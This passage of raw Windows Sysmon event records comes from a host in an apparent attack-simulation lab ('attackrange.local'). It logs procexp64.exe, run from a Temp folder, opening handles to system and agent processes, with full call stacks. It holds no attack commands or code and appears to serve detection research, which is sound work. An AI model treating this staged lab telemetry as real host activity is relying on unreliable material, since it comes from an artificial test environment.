4d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790312Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790311Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790310Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790309Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790308Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790307Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790306Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790305Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790304Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790303Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790302Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790301Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790300Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790299Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790298Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790297Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790296Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790295Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppD